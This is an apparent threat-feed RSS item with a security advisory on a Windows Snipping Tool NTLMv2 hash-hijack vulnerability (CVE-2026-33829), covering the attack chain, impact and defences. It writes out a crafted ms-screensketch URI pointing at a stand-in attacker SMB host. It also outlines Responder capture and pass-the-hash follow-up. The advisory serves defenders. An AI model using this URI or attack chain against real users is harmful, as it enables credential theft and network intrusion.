<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/cpes/cpe2.3omicrosoftwindows_10_1607x86/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 15 May 2026 14:50:44 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/cpes/cpe2.3omicrosoftwindows_10_1607x86/feed.xml" rel="self" type="application/rss+xml"/><item><title>Windows Snipping Tool NTLMv2 Hash Hijack Vulnerability (CVE-2026-33829)</title><link>https://feed.craftedsignal.io/briefs/2026-05-snipping-tool-ntlm-hijack/</link><pubDate>Fri, 15 May 2026 14:50:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-snipping-tool-ntlm-hijack/</guid><description>A local exploit has been published for Windows Snipping Tool (CVE-2026-33829), enabling NTLMv2 Hash Hijacking by forcing authentication to a remote SMB server via a crafted ms-screensketch:edit URI, potentially leading to credential theft and lateral movement.</description><content:encoded><![CDATA[<p>A public exploit (EDB-52567) has been published detailing an NTLMv2 Hash Hijack vulnerability (CVE-2026-33829) within the Windows Snipping Tool. This vulnerability allows an attacker to force a victim system to authenticate to a remote SMB server under the attacker&rsquo;s control. The exploit leverages a specially crafted <code>ms-screensketch:edit</code> URI. When a user clicks a malicious link and approves the &ldquo;Open Snipping Tool&rdquo; prompt, their NTLMv2 hash is sent to the attacker&rsquo;s server. This exploit extends beyond the original vector by also attempting to harvest HTTP NTLM hashes via WPAD, LLMNR, and MDNS poisoning, potentially capturing multiple valid hashes from a single user interaction. The affected systems include Windows 10, Windows 11, and Windows Server versions 2012 through 2025 (prior to the April 14, 2026 patch).</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker sets up a malicious SMB server and Responder on Kali Linux.</li>
<li>Attacker crafts a malicious HTML page containing an <code>ms-screensketch:edit</code> URI pointing to the attacker&rsquo;s SMB server: <code>ms-screensketch:edit?filePath=\\&lt;ATTACKER_IP&gt;\test\evil.png</code>.</li>
<li>The attacker hosts the malicious HTML page on an HTTP server.</li>
<li>The victim browses to the malicious page and clicks a link or button that triggers the <code>ms-screensketch:edit</code> URI.</li>
<li>The victim&rsquo;s system prompts them to &ldquo;Open Snipping Tool&rdquo;.</li>
<li>If the user approves the prompt, Windows attempts to authenticate to the attacker&rsquo;s SMB server using NTLMv2.</li>
<li>Responder captures the NTLMv2 hash from the authentication attempt.</li>
<li>The attacker uses the captured NTLMv2 hash in a Pass-the-Hash attack using tools like <code>impacket-psexec</code> to gain unauthorized access to other systems on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-33829 allows an attacker to capture a user&rsquo;s NTLMv2 hash. This hash can then be used in Pass-the-Hash attacks, enabling lateral movement and potentially leading to domain compromise. While the CVSS score is rated as Medium (4.3), the impact in practice can be High, as credential theft can lead to significant data breaches and system compromise. The number of potential victims is broad, encompassing any unpatched Windows 10, 11, or Server system.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the Microsoft patch released on April 14, 2026, to remediate CVE-2026-33829.</li>
<li>Implement the Sigma rule &ldquo;Detect Snipping Tool NTLMv2 Hash Hijack Attempt via URI&rdquo; to detect attempts to exploit this vulnerability.</li>
<li>Block outbound SMB traffic (port 445) to prevent successful NTLMv2 hash capture.</li>
<li>Disable NTLMv1 and restrict NTLMv2 via Group Policy to mitigate the risk of Pass-the-Hash attacks after successful exploitation.</li>
<li>Educate users about the risks of clicking &ldquo;Open Snipping Tool&rdquo; prompts from untrusted sources.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>credential-access</category><category>ntlmv2</category><category>pass-the-hash</category><category>cve-2026-33829</category></item></channel></rss>